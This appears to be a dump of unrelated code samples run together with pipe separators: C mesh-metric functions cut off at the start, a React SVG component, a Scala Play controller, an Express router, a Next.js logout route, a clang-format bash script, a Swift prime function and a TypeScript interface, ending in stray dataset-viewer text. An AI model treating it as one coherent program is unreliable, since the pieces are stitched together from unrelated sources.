  /* cleaning if an error occurs */
// m_metric_p_i_values_free:
//   free(m_metric_p_i->values);
m_metric_p_i_positions_free:
  free(m_metric_p_i->positions);
m_metric_p_i_free:
  free(m_metric_p_i);
end:
  return NULL;
}
/*
 * Computes the metric sparse vector for every cell of dimension p.
 * m_vol_p holds the volumes of the p-cells, indexed like the cells.
 *
 * Returns an array of m->cn[p] sparse vectors, or NULL on failure (already
 * constructed entries are released with vector_sparse_array_free).
 * Errors are detected via errno, per this file's convention.
 */
vector_sparse ** mesh_qc_metric_p(
  const mesh_qc * m, int p, const double * m_vol_p)
{
  int i, m_cn_p;
  int * m_cn;
  jagged1 m_cf_p_0_i;
  vector_sparse ** m_metric_p;

  m_cn = m->cn;
  m_cn_p = m_cn[p];
  m_metric_p = (vector_sparse **) malloc(sizeof(vector_sparse *) * m_cn_p);
  if (errno)
  {
    fprintf(stderr,
            "mesh_qc_metric_p - cannot allocate memory for m_metric[%d]\n", p);
    return NULL;
  }
  for (i = 0; i < m_cn_p; ++i)
  {
    /* view of the 0-dimensional faces (vertices) of cell (p, i) */
    mesh_cf_part3(&m_cf_p_0_i, m, p, 0, i);
    m_metric_p[i] = mesh_qc_metric_p_i(m_cn[0], &m_cf_p_0_i, p, i, m_vol_p[i]);
    if (errno)
    {
      fprintf(stderr, "mesh_qc_metric_p - cannot calculate "
              "m_metric[%d][%d]\n", p, i);
      vector_sparse_array_free(m_metric_p, i);
      return NULL;
    }
  }
  return m_metric_p;
}
/*
 * Computes the metric for every dimension p = 0 .. m->dim.
 * m_vol[p] holds the volumes of the p-cells.
 *
 * Returns an array of m->dim + 1 per-dimension metric arrays, or NULL on
 * failure (partially built results are released with
 * vector_sparse_array2_free). Errors are detected via errno.
 */
vector_sparse *** mesh_qc_metric(const mesh_qc * m, double ** m_vol)
{
  int m_dim, p;
  vector_sparse *** m_metric;

  m_dim = m->dim;
  m_metric = (vector_sparse ***) malloc(sizeof(vector_sparse **) * (m_dim + 1));
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric - cannot allocate memory for m_metric\n");
    return NULL;
  }
  for (p = 0; p <= m_dim; ++p)
  {
    m_metric[p] = mesh_qc_metric_p(m, p, m_vol[p]);
    if (errno)
    {
      fprintf(stderr, "mesh_qc_metric - cannot calculate m_metric[%d]\n", p);
      vector_sparse_array2_free(m_metric, p, m->cn);
      return NULL;
    }
  }
  return m_metric;
}
/*
 * Scans the metric sparse vector for cell i of dimension p from `in`.
 * Mirrors mesh_qc_metric_p_i: the sparsity pattern (positions) is copied
 * from m_cf_p_0_i, but the values are read from the file instead of being
 * computed.
 *
 * Returns the newly allocated vector, or NULL on failure. Errors are
 * detected by testing errno after each call, per this file's convention
 * (assumes errno is 0 on entry).
 */
static vector_sparse * mesh_qc_metric_p_i_fscan(
  FILE * in, int m_cn_0, const jagged1 * m_cf_p_0_i, int p, int i)
{
  vector_sparse * m_metric_p_i;

  m_metric_p_i = (vector_sparse *) malloc(sizeof(vector_sparse));
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric_p_i_fscan - cannot allocate memory for "
            "m_metric[%d][%d]\n", p, i);
    goto end;
  }
  /* length: total number of 0-cells; nonzeros: the cell's vertices */
  m_metric_p_i->length = m_cn_0;
  m_metric_p_i->nonzero_max = m_cf_p_0_i->a0;
  m_metric_p_i->positions =
    (int *) malloc(sizeof(int) * m_metric_p_i->nonzero_max);
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric_p_i_fscan - cannot allocate memory for "
            "m_metric[%d][%d]->positions\n", p, i);
    goto m_metric_p_i_free;
  }
  memcpy(m_metric_p_i->positions, m_cf_p_0_i->a1,
         sizeof(int) * m_metric_p_i->nonzero_max);
  m_metric_p_i->values =
    double_array_fscan(in, m_metric_p_i->nonzero_max, "--raw");
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric_p_i_fscan - cannot scan "
            "m_metric[%d][%d]->values\n", p, i);
    /* BUG FIX: the cleanup label below already frees `positions`; the
       original also called free(m_metric_p_i->positions) here, causing a
       double free (undefined behavior) on this error path. */
    goto m_metric_p_i_positions_free;
  }
  return m_metric_p_i;

  /* cleaning if an error occurs */
m_metric_p_i_positions_free:
  free(m_metric_p_i->positions);
m_metric_p_i_free:
  free(m_metric_p_i);
end:
  return NULL;
}
/*
 * Scans the metric sparse vectors for every cell of dimension p from `in`.
 *
 * Returns an array of m->cn[p] sparse vectors, or NULL on failure (already
 * constructed entries are released with vector_sparse_array_free).
 * Errors are detected via errno, per this file's convention.
 */
vector_sparse ** mesh_qc_metric_p_fscan(FILE * in, const mesh_qc * m, int p)
{
  int i, m_cn_p;
  int * m_cn;
  jagged1 m_cf_p_0_i;
  vector_sparse ** m_metric_p;

  m_cn = m->cn;
  m_cn_p = m_cn[p];
  m_metric_p = (vector_sparse **) malloc(sizeof(vector_sparse *) * m_cn_p);
  if (errno)
  {
    fprintf(stderr, "mesh_qc_metric_p_fscan - cannot allocate memory for "
            "m_metric[%d]\n", p);
    return NULL;
  }
  for (i = 0; i < m_cn_p; ++i)
  {
    /* view of the 0-dimensional faces (vertices) of cell (p, i) */
    mesh_cf_part3(&m_cf_p_0_i, m, p, 0, i);
    m_metric_p[i] = mesh_qc_metric_p_i_fscan(in, m_cn[0], &m_cf_p_0_i, p, i);
    if (errno)
    {
      fprintf(stderr,
              "mesh_qc_metric_p_fscan - cannot scan m_metric[%d][%d]\n", p, i);
      vector_sparse_array_free(m_metric_p, i);
      return NULL;
    }
  }
  return m_metric_p;
}
/*
 * Scans the metric for every dimension p = 0 .. m->dim from `in`.
 *
 * Returns an array of m->dim + 1 per-dimension metric arrays, or NULL on
 * failure (partially built results are released with
 * vector_sparse_array2_free). Errors are detected via errno.
 */
vector_sparse *** mesh_qc_metric_fscan(FILE * in, const mesh_qc * m)
{
  int m_dim, p;
  vector_sparse *** m_metric;

  m_dim = m->dim;
  m_metric = (vector_sparse ***) malloc(sizeof(vector_sparse **) * (m_dim + 1));
  if (errno)
  {
    fputs("mesh_qc_metric_fscan - cannot allocate memory for m_metric\n",
          stderr);
    return NULL;
  }
  for (p = 0; p <= m_dim; ++p)
  {
    m_metric[p] = mesh_qc_metric_p_fscan(in, m, p);
    if (errno)
    {
      fprintf(stderr, "mesh_qc_metric_fscan - cannot scan m_metric[%d]\n", p);
      vector_sparse_array2_free(m_metric, p, m->cn);
      return NULL;
    }
  }
  return m_metric;
}
|
import React from "react";
// Styles
import styles from "./Contact.module.scss";
// Decorative illustration for the Contact page.
// Purely presentational: takes no props and renders a fixed SVG (two chat
// bubbles and a seated person) wrapped in a div whose layout/animation comes
// from Contact.module.scss.
const Illustration = () => {
  // The SVG markup below is exported artwork; treat it as opaque data and
  // regenerate it from the design tool rather than editing path data by hand.
  return (
    <div className={styles.Illustration}>
      <svg
        width="588.124"
        height="550"
        viewBox="0 0 588.124 550"
        className={styles.IllustrationContent}
      >
        <g
          id="Contact_Illustrator"
          data-name="Contact Illustrator"
          transform="translate(-1101.659 -1209)"
        >
          <g id="Chat" transform="translate(1074.02 1209.281)">
            <path
              id="Path_33"
              data-name="Path 33"
              d="M335.819,347.441,314.094,371.8c18.049,7.656,36.318-2.972,43.807-8.3a108.5,108.5,0,1,0-22.082-16.053Z"
              transform="translate(-274.012 -160.176)"
              fill="#e6e6e6"
            />
            <path
              id="Path_34"
              data-name="Path 34"
              d="M357.947,261.769c22.413-.233,44.823-.634,67.236-.938q11.207-.152,22.416-.267c6.438-.067,6.455-10.078,0-10.011-22.413.233-44.823.634-67.236.939q-11.208.152-22.416.267c-6.438.067-6.455,10.078,0,10.011Z"
              transform="translate(-280.344 -171.333)"
            />
            <path
              id="Path_35"
              data-name="Path 35"
              d="M357.947,288.406l90.585-.939,25.763-.267c6.438-.067,6.455-10.078,0-10.011l-90.585.939-25.763.267C351.508,278.461,351.492,288.473,357.947,288.406Z"
              transform="translate(-280.344 -174.611)"
            />
            <path
              id="Path_48"
              data-name="Path 48"
              d="M674.951,363.255A108.3,108.3,0,1,0,618.7,458.268c7.489,5.329,25.759,15.957,43.807,8.3l-21.726-24.354a108.032,108.032,0,0,0,34.167-78.959Z"
              transform="translate(-293.296 -171.879)"
              fill="#f9a826"
            />
            <path
              id="Path_49"
              data-name="Path 49"
              d="M517.969,356.5c22.413-.233,44.824-.634,67.236-.938q11.208-.152,22.415-.267c6.438-.067,6.455-10.078,0-10.011-22.413.233-44.823.634-67.236.938q-11.208.152-22.416.267C511.531,346.553,511.515,356.564,517.969,356.5Z"
              transform="translate(-300.038 -182.991)"
            />
            <path
              id="Path_50"
              data-name="Path 50"
              d="M517.969,383.134l90.585-.938,25.763-.267c6.438-.067,6.454-10.078,0-10.011l-90.585.939-25.763.267c-6.438.067-6.454,10.078,0,10.011Z"
              transform="translate(-300.038 -186.269)"
            />
            <path
              id="Path_51"
              data-name="Path 51"
              d="M517.969,409.772l90.585-.939,25.763-.267c6.438-.067,6.454-10.078,0-10.011l-90.585.939-25.763.267C511.531,399.827,511.515,409.839,517.969,409.772Z"
              transform="translate(-300.038 -189.547)"
            />
          </g>
          <g id="Person" transform="translate(1519.998 1209)">
            <path
              id="Path_52"
              data-name="Path 52"
              d="M323.828,211.155s8.391,19.929-10.489,29.369,50.347,27.271,57.689,4.2c0,0-18.88-7.342-10.489-29.369Z"
              transform="translate(-241.974 -143.395)"
              fill="#ffb9b9"
            />
            <path
              id="Path_53"
              data-name="Path 53"
              d="M120.167,552.567l-1.049,22.027,17.831,3.147V555.714Z"
              transform="translate(-15.762 -73.118)"
              fill="#ffb9b9"
            />
            <path
              id="Path_54"
              data-name="Path 54"
              d="M40.4,552.567l1.049,22.027-17.831,3.147V555.714Z"
              transform="translate(-3.125 -73.118)"
              fill="#ffb9b9"
            />
            <circle
              id="Ellipse_5"
              data-name="Ellipse 5"
              cx="29.369"
              cy="29.369"
              r="29.369"
              transform="translate(72.938 21.084)"
              fill="#ffb9b9"
            />
            <path
              id="Path_55"
              data-name="Path 55"
              d="M164.895,303.544l-1.05,8.391,5.245,19.93,7.341-17.831Z"
              transform="translate(-21.68 -40.166)"
              fill="#ffb9b9"
            />
            <path
              id="Path_56"
              data-name="Path 56"
              d="M260.235,439.752l-6.293,74.471S246.6,527.859,250.8,539.4c0,0-6.293,15.734-4.2,20.978s3.147,10.489,1.049,12.587-3.147,60.836,0,66.08,5.244,17.831,5.244,17.831,17.831,4.2,22.027-7.342,2.1-12.587,6.293-15.733,4.2-47.2,4.2-47.2-5.244-5.245-2.1-7.342,5.244,0,2.1-5.245-8.391-5.245-3.147-7.342a50,50,0,0,0,8.391-4.2l30.418-79.716s11.538,89.156,13.635,93.352,5.245-1.049,2.1,4.2-4.2,2.1-3.147,5.244-6.293,48.249-2.1,57.689a142.158,142.158,0,0,1,6.293,16.782s16.782,7.342,18.88,2.1,1.049-14.684,4.2-15.733,6.293-3.146,6.293-11.538,6.293-49.3,6.293-49.3-7.342-3.146-5.245-8.391,2.1-4.2,1.049-8.391-3.147-5.244-1.049-8.391,2.1-12.587,2.1-12.587l12.587-82.862-9.72-28.32Z"
              transform="translate(-233.449 -173.227)"
              fill="#2f2e41"
            />
            <path
              id="Path_57"
              data-name="Path 57"
              d="M352.322,704.474s-3.147-3.146-4.2,0-1.049,32.516-1.049,32.516,8.391,6.293,8.391,9.44,6.293,13.635,20.978,11.538q.22-.032.436-.066a13.887,13.887,0,0,0,10.326-19.657l-14.957-31.673S361.763,696.083,352.322,704.474Z"
              transform="translate(-246.868 -208.243)"
              fill="#2f2e41"
            />
            <path
              id="Path_58"
              data-name="Path 58"
              d="M267.814,704.474s3.147-3.146,4.2,0,1.049,32.516,1.049,32.516-8.391,6.293-8.391,9.44-6.293,13.635-20.978,11.538q-.22-.032-.436-.066a13.887,13.887,0,0,1-10.325-19.657l14.957-31.673S258.373,696.083,267.814,704.474Z"
              transform="translate(-231.587 -208.243)"
              fill="#2f2e41"
            />
            <path
              id="Path_59"
              data-name="Path 59"
              d="M322.147,151.7l-5.247-2.1s10.971-12.079,26.236-11.029l-4.293-4.727s10.494-4.2,20.035,6.827c5.015,5.8,10.818,12.612,14.435,20.289h5.619l-2.345,5.164,8.209,5.164-8.425-.928a28.576,28.576,0,0,1-.8,13.375l.226,4.082s-9.767-15.11-9.767-17.212v5.252s-5.247-4.727-5.247-7.878l-2.862,3.676-1.431-5.777-17.65,5.777,2.862-4.727-10.972,1.576,4.293-5.777s-12.4,6.827-12.88,12.6-6.678,13.129-6.678,13.129l-2.862-5.252S308.314,159.581,322.147,151.7Z"
              transform="translate(-242.224 -133.061)"
              fill="#2f2e41"
            />
            <path
              id="Path_60"
              data-name="Path 60"
              d="M400.286,266.157h11.686a3.781,3.781,0,0,1,3.69,2.95c1.8,7.985,6.45,30.62,5.6,48.446-1.049,22.027,1.049,37.76,0,40.907s0,4.2,0,7.342,3.147,1.049,0,5.245-3.147,3.147-3.147,6.293-10.489,51.4-10.489,51.4-7.211-11.852-15.143-9.6l1.508-42.848,2.1-17.831-3.147-31.467Z"
              transform="translate(-252.877 -150.674)"
              fill="#3f3d56"
            />
            <path
              id="Path_61"
              data-name="Path 61"
              d="M331.954,252.215s-17.831-.648-23.6-8.191c0,0-37.236,12.387-41.431,22.875s14.684,57.689,14.684,57.689-32.516,96.5-16.782,96.5,51.4,12.587,72.374,5.244a269.7,269.7,0,0,1,39.858-10.489s2.1-28.32,0-33.564-7.342-2.1-4.2-9.44,2.1-8.391,1.049-11.537,2.1-7.343,2.1-11.538-1.049-13.635-1.049-13.635,28.32-66.08,22.027-72.374-38.328-18.42-38.328-18.42S349.785,256.411,331.954,252.215Z"
              transform="translate(-235.416 -147.744)"
              fill="#3f3d56"
            />
            <path
              id="Path_62"
              data-name="Path 62"
              d="M247.524,448.694s-9.44,49.3,6.293,45.1,8.391-45.1,8.391-45.1Z"
              transform="translate(-233.324 -174.827)"
              fill="#ffb9b9"
            />
            <path
              id="Path_63"
              data-name="Path 63"
              d="M270.852,266.157l-3.725,1.863a10.5,10.5,0,0,0-5.627,7.46l-14.772,78.784s-4.2,9.44-4.2,10.489,2.1,1.049,0,4.2-5.244,2.1-3.147,4.2a6.5,6.5,0,0,1,2.1,4.2l2.1,51.4s17.831-5.245,23.075,0c0,0-5.244-15.733-2.1-20.978s3.147-12.587,3.147-12.587-2.1,0,3.146-5.244,6.293-7.342,5.245-8.391S274,371.046,274,370s10.489-71.325,10.489-71.325Z"
              transform="translate(-232.527 -150.674)"
              fill="#3f3d56"
            />
          </g>
        </g>
      </svg>
    </div>
  );
};
export default Illustration;
|
package controllers
import play.api.mvc.{Action, Controller}
import play.api.Routes
import models._
import play.api.libs.json.Json
import play.api.libs.json._
import play.api.libs.json.Reads._
import play.api.libs.functional.syntax._
import java.sql.Timestamp
import java.util.Date
import play.api.mvc.Results
/**
 * Main controller for the social-feed application. All actions are wrapped
 * in the `withUser` authentication helpers from the `Secured` trait and
 * delegate persistence to `UserDAO`.
 *
 * NOTE(review): the toggle actions below return strings with two different
 * conventions -- endorse/topic actions appear to return the *next* available
 * action (a button label), while subscribePost/subscribeUser return the
 * action just *performed*. Confirm against the client-side JS before
 * normalizing.
 */
object Application extends Controller with Secured {

  /**
   * Index action: renders the news-feed page for the authenticated user.
   */
  def index = withUser { user => implicit request =>
    val feed = UserDAO.getFeed(user.id.get)
    Ok(views.html.index(feed))
  }

  /**
   * Helper class carrying the JSON payload of a new post.
   */
  case class PostData(topicId: Long, content: String)

  /**
   * Post action which consumes post data in the form of JSON.
   * Content must be at least 10 characters; validation failures yield a 400
   * with the flattened JSON errors.
   */
  def post() = withUserWithBodyParser(parse.json) { user => implicit request =>
    /**
     * Reads[PostData] converts the JSON body to a PostData object, which is
     * then turned into a Post row and persisted.
     */
    implicit val postDataReads: Reads[PostData] = (
      (JsPath \ "topicId").read[Long] and
      (JsPath \ "content").read[String](minLength[String](10))
    )(PostData.apply _)

    request.body.validate[PostData].fold(
      valid = { postData =>
        val post = Post(user.id.get, postData.topicId, new Timestamp(new Date().getTime()), postData.content, None)
        UserDAO.savePost(post)
        Ok("saved to Database")
      },
      invalid = { errors =>
        BadRequest(JsError.toFlatJson(errors))
      }
    )
  }

  /**
   * Exposes the listed reverse routes to client-side JavaScript as
   * `jsRoutes`.
   */
  def javascriptRoutes() = Action { implicit request =>
    import routes.javascript._
    Ok(Routes.javascriptRouter("jsRoutes")(
      controllers.routes.javascript.Application.post,
      controllers.routes.javascript.Application.message,
      controllers.routes.javascript.Application.endorseOrDismissPost,
      controllers.routes.javascript.Application.endorseOrDismissComment,
      controllers.routes.javascript.Application.comment,
      controllers.routes.javascript.Application.subscribePost,
      controllers.routes.javascript.Application.subscribeUser,
      controllers.routes.javascript.Application.subscribeTopic,
      controllers.routes.javascript.Application.posts,
      controllers.routes.javascript.Application.isTopicSubscribed,
      controllers.routes.javascript.Application.isEndorsedPost
      )
    ).as(JAVASCRIPT)
  }

  /**
   * Example of exposing an action through the JavaScript routes.
   */
  def message = Action {
    Ok(Json.toJson("hello world"))
  }

  /**
   * Queries database, gets the feed data and incrementally sends it to the
   * user. (Currently disabled; the index action renders the feed instead.)
   */
  /*
  def feed() = withUser { user => implicit request =>
    val feed = UserDAO.getFeed(user.id.get)
    implicit val feedWrites: Writes[(User, Post)] = new Writes[(User, Post)] {
      def writes(feeds: ((User, Post)) ): JsValue = Json.obj(
        "uid" -> Json.toJson(feeds._1.id.get),
        "email" -> Json.toJson(feeds._1.email),
        "description" -> Json.toJson(feeds._1.desc),
        "location" -> Json.toJson(feeds._1.location),
        "postid" -> Json.toJson(feeds._2.id),
        "content" -> Json.toJson(feeds._2.content),
        "timestamp" -> Json.toJson(feeds._2.timestamp),
        "topicId" -> Json.toJson(feeds._2.topicId)
      )
    }
    Ok(Json.toJson(feed)).as(JAVASCRIPT)
  }*/

  /**
   * Toggles the current user's endorsement of the given post.
   * NOTE(review): responds "endorse" after *removing* an endorsement and
   * "dismiss" after adding one -- presumably the next available action for
   * the client button; confirm before changing.
   */
  def endorseOrDismissPost(postId: Long) = withUser { user => implicit request =>
    val endorsed = UserDAO.isEndorsedPost(user.id.get, postId)
    if(endorsed){
      UserDAO.endorseOrDismissPost(user.id.get, postId)
      Ok(Json.toJson("endorse"))
    }else {
      UserDAO.endorseOrDismissPost(user.id.get, postId)
      Ok(Json.toJson("dismiss"))
    }
  }

  /**
   * Toggles the current user's endorsement of the given comment.
   * Same response convention as endorseOrDismissPost (see note there).
   */
  def endorseOrDismissComment(commentId: Long) = withUser { user => implicit request =>
    val endorsed = UserDAO.isEndorsedComment(user.id.get, commentId)
    if(endorsed) {
      UserDAO.endorseOrDismissComment(user.id.get, commentId)
      Ok(Json.toJson("endorse"))
    }else {
      UserDAO.endorseOrDismissComment(user.id.get, commentId)
      Ok(Json.toJson("dismiss"))
    }
  }

  /**
   * Helper class for taking comment data from JSON.
   */
  case class CommentData(postId: Long, content: String)

  /**
   * Action for adding comments to a post. Content must be non-empty;
   * validation failures yield a 400 with the flattened JSON errors.
   */
  def comment() = withUserWithBodyParser(parse.json) { user => implicit request =>
    /**
     * Reads converts the JSON body into a CommentData object.
     */
    implicit val commentDataReads: Reads[CommentData] = (
      (JsPath \ "postId").read[Long] and
      (JsPath \ "content").read[String](minLength[String](1))
    )(CommentData.apply _)

    request.body.validate[CommentData].fold(
      valid = {commentData =>
        val comment = Comment(user.id.get, commentData.postId, commentData.content)
        UserDAO.saveComment(comment)
        Ok("saved")
      },
      invalid = {errors =>
        Results.BadRequest(JsError.toFlatJson(errors))
      }
    )
  }

  /**
   * Renders the profile page for the user with the given email,
   * or 403 if no such user exists.
   */
  def profile(email: String) = withUser { user => implicit request =>
    UserDAO.findOneByEmail(email) match {
      case Some(p) => Ok(views.html.user(p))
      case None => Results.Forbidden
    }
  }

  /**
   * Toggles the current user's subscription to a post.
   * NOTE(review): unlike the endorse actions, this reports the action just
   * performed ("subscribed"/"unsubscribed").
   */
  def subscribePost(id: Long) = withUser { user => implicit request =>
    val subscribed = UserDAO.isPostSubscribed(user.id.get, id)
    if(subscribed) {
      UserDAO.subscribeOrUnsubscribePost(user.id.get, id)
      Ok("unsubscribed").as(JAVASCRIPT)
    }else {
      UserDAO.subscribeOrUnsubscribePost(user.id.get, id)
      Ok("subscribed").as(JAVASCRIPT)
    }
  }

  /**
   * Toggles the current user's subscription to another user.
   */
  def subscribeUser(id: Long) = withUser { user => implicit request =>
    val subscribed = UserDAO.isUserSubscribed(user.id.get, id)
    if(subscribed) {
      UserDAO.subscribeOrUnsubscribeUser(user.id.get, id)
      Ok("unsubscribed").as(JAVASCRIPT)
    }else {
      UserDAO.subscribeOrUnsubscribeUser(user.id.get, id)
      Ok("subscribed").as(JAVASCRIPT)
    }
  }

  /**
   * Toggles the current user's subscription to a topic.
   * NOTE(review): responds "follow" after unsubscribing and "unfollow" after
   * subscribing -- presumably the next available action; confirm with the
   * client JS.
   */
  def subscribeTopic(id: Long) = withUser { user => implicit request =>
    val subscribed = UserDAO.isTopicSubscribed(user.id.get, id)
    if(subscribed) {
      UserDAO.subscribeOrUnsubscribeTopic(user.id.get, id)
      Ok(Json.toJson("follow"))
    }else {
      UserDAO.subscribeOrUnsubscribeTopic(user.id.get, id)
      Ok(Json.toJson("unfollow"))
    }
  }

  /*
  def posts() = withUser { user => implicit request =>
    val posts = UserDAO.getPosts(user.id.get)
    implicit val postWrites: Writes[Post] = new Writes[Post] {
      def writes(p: Post): JsValue = Json.obj(
        "postId" -> p.id,
        "content" -> p.content,
        "userId" -> p.userId,
        "topicId" -> p.topicId,
        "timestamp" -> p.timestamp
      )
    }
    Ok(Json.toJson(posts))
  }
  */

  /**
   * Renders the authenticated user's own posts.
   */
  def posts() = withUser { user => implicit request =>
    val posts = UserDAO.getPosts(user.id.get)
    Ok(views.html.posts(posts))
  }

  /**
   * Renders the topics page for the authenticated user.
   */
  def topics = withUser { user => implicit request =>
    Ok(views.html.topics(user))
  }

  /** Returns (as JSON) whether the user has endorsed the given post. */
  def isEndorsedPost(id: Long) = withUser { user => implicit request =>
    val endorsed = UserDAO.isEndorsedPost(user.id.get, id)
    Ok(Json.toJson(endorsed)).as(JAVASCRIPT)
  }

  /** Returns (as JSON) whether the user has endorsed the given comment. */
  def isEndorsedComment(id: Long) = withUser { user => implicit request =>
    val endorsed = UserDAO.isEndorsedComment(user.id.get, id)
    Ok(Json.toJson(endorsed)).as(JAVASCRIPT)
  }

  /** Returns (as JSON) whether the user is subscribed to the given user. */
  def isUserSubscribed(id: Long) = withUser { user => implicit request =>
    val subscribed = UserDAO.isUserSubscribed(user.id.get, id)
    Ok(Json.toJson(subscribed)).as(JAVASCRIPT)
  }

  /** Returns (as JSON) whether the user is subscribed to the given post. */
  def isPostSubscribed(id: Long) = withUser { user => implicit request =>
    val subscribed = UserDAO.isPostSubscribed(user.id.get, id)
    Ok(Json.toJson(subscribed)).as(JAVASCRIPT)
  }

  /** Returns (as JSON) whether the user is subscribed to the given topic. */
  def isTopicSubscribed(id: Long) = withUser { user => implicit request =>
    val subscribed = UserDAO.isTopicSubscribed(user.id.get, id)
    Ok(Json.toJson(subscribed)).as(JAVASCRIPT)
  }

  /** Placeholder: renders an empty page for a single post. TODO implement. */
  def showPost(postId: Long) = withUser { user => implicit request =>
    Ok("")
  }
}
|
// Express router for the combo-list endpoints.
const express = require('express')
const { uploader } = require('../middleware/multerFile')
const router = express.Router()

// Controllers
const { uploadFile, getComboFile } = require('../controllers/womboController')

// Routes
// POST /list/upload: accepts any multipart field names (multer .any()) and
// delegates the uploaded files to uploadFile.
router.post('/list/upload', uploader.any(), uploadFile)
// GET /list/download: returns the combined file -- see getComboFile in
// womboController for the exact response shape.
router.get('/list/download', getComboFile)

module.exports = router
|
import { NextApiRequest, NextApiResponse } from "next";
import { removeTokenCookie } from "~/lib/api/account";
/**
 * API route that logs the current user out by clearing the auth-token
 * cookie. Only POST is supported.
 *
 * BUG FIX: the original sent no response at all for non-POST requests, so
 * clients would hang until timeout; now such requests get a 405 with an
 * Allow header.
 */
export default async function logout(
  req: NextApiRequest,
  res: NextApiResponse
) {
  if (req.method === "POST") {
    removeTokenCookie(res);
    res.end();
    return;
  }
  res.setHeader("Allow", "POST");
  res.status(405).end(`Method ${req.method} Not Allowed`);
}
|
#!/usr/bin/env bash

# Formats the project's C++ sources in place with clang-format 11.
#
# Usage: scripts/<this-script> --overwrite-inplace [files...]
#
# Argument convention: with exactly one argument (the mandatory
# --overwrite-inplace flag, checked further below) every tracked *.cpp/*.h
# file is formatted; any additional arguments restrict the run to those
# files (non-C++ paths are silently dropped).

set -e

# Run from the repository root, one level above this script's directory.
script_path=$(cd -P -- "$(dirname -- "$0")" && pwd -P)
cd "${script_path}/.." || exit 1

if [ "$#" -eq "1" ]; then
    # No explicit file list: take all tracked C++ files, excluding
    # third-party / imported sources that must keep their upstream style.
    mapfile -t files < <(
        git ls-files -- \
            '*.cpp' \
            '*.h' \
            ':!:Base' \
            ':!:Kernel/Arch/i386/CPU.cpp' \
            ':!:Kernel/FileSystem/ext2_fs.h' \
            ':!:Userland/Libraries/LibC/getopt.cpp' \
            ':!:Userland/Libraries/LibC/syslog.h' \
            ':!:Userland/Libraries/LibCore/puff.h' \
            ':!:Userland/Libraries/LibCore/puff.cpp' \
            ':!:Userland/Libraries/LibELF/exec_elf.h'
    )
else
    # Explicit file list (arguments after the flag): keep only C++ files.
    files=()
    for file in "${@:2}"; do
        if [[ "${file}" == *".cpp" || "${file}" == *".h" ]]; then
            files+=("${file}")
        fi
    done
fi

if (( ${#files[@]} )); then
    # Prefer the versioned binary; fall back to plain clang-format but warn
    # when it is not version 11, since output differs between versions.
    CLANG_FORMAT=false
    if command -v clang-format-11 >/dev/null 2>&1 ; then
        CLANG_FORMAT=clang-format-11
    elif command -v clang-format >/dev/null 2>&1 ; then
        CLANG_FORMAT=clang-format
        if ! "${CLANG_FORMAT}" --version | grep -qF ' 11.' ; then
            echo "You are using '$("${CLANG_FORMAT}" --version)', which appears to not be clang-format 11."
            echo "It is very likely that the resulting changes are not what you wanted."
        fi
    else
        echo "clang-format-11 is not available, but C or C++ files need linting! Either skip this script, or install clang-format-11."
        echo "(If you install a package 'clang-format', please make sure it's version 11.)"
        exit 1
    fi

    # Require the explicit opt-in flag as the first argument, since this
    # rewrites files in the working tree.
    if [ "$#" -gt "0" ] && [ "x--overwrite-inplace" = "x$1" ] ; then
        true # The only way to run this script.
    else
        # Note that this branch also covers --help, -h, -help, -?, etc.
        echo "USAGE: $0 --overwrite-inplace"
        echo "The argument is necessary to make you aware that this *will* overwrite your local files."
        exit 1
    fi

    echo "Using ${CLANG_FORMAT}"
    "${CLANG_FORMAT}" -style=file -i "${files[@]}"
    echo "Maybe some files have changed. Sorry, but clang-format doesn't indicate what happened."
else
    echo "No .cpp or .h files to check."
fi
|
/// Returns all prime numbers strictly less than `n`, in ascending order,
/// using trial division up to the square root of each candidate.
///
/// BUG FIX: the original formed the range `2...maxDivisor` unconditionally,
/// which traps at runtime for num = 2 or 3 (maxDivisor = 1 < 2, and a
/// ClosedRange requires lowerBound <= upperBound); it also trapped for
/// n < 2 via `2..<n`. Both cases are now handled: a half-open range is
/// used for the divisors and small `n` returns an empty array.
func primeNumbers(upTo n: Int) -> [Int] {
    guard n > 2 else { return [] }
    var primes = [Int]()
    for num in 2..<n {
        var isPrime = true
        // Checking divisors up to sqrt(num) is sufficient; squareRoot() is
        // pure stdlib, so no Foundation import is needed.
        let maxDivisor = Int(Double(num).squareRoot())
        // Half-open range: empty (no trap) when maxDivisor < 2, e.g. num = 2, 3.
        for divisor in 2..<(maxDivisor + 1) {
            if num % divisor == 0 {
                isPrime = false
                break
            }
        }
        if isPrime {
            primes.append(num)
        }
    }
    return primes
}
let result = primeNumbers(upTo: 10)
print(result)
// Output: [2, 3, 5, 7]
|
import { ReactNode } from 'react';
/**
 * Props contract for the consuming component (the component itself is not
 * visible from this file).
 */
export interface Props {
  /** Identifier for the item -- presumably used as a key/anchor; confirm at the call site. */
  name: string;
  /** Human-readable title displayed for the item. */
  title: string;
  /** Arbitrary renderable content (elements, strings, fragments). */
  body: ReactNode;
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.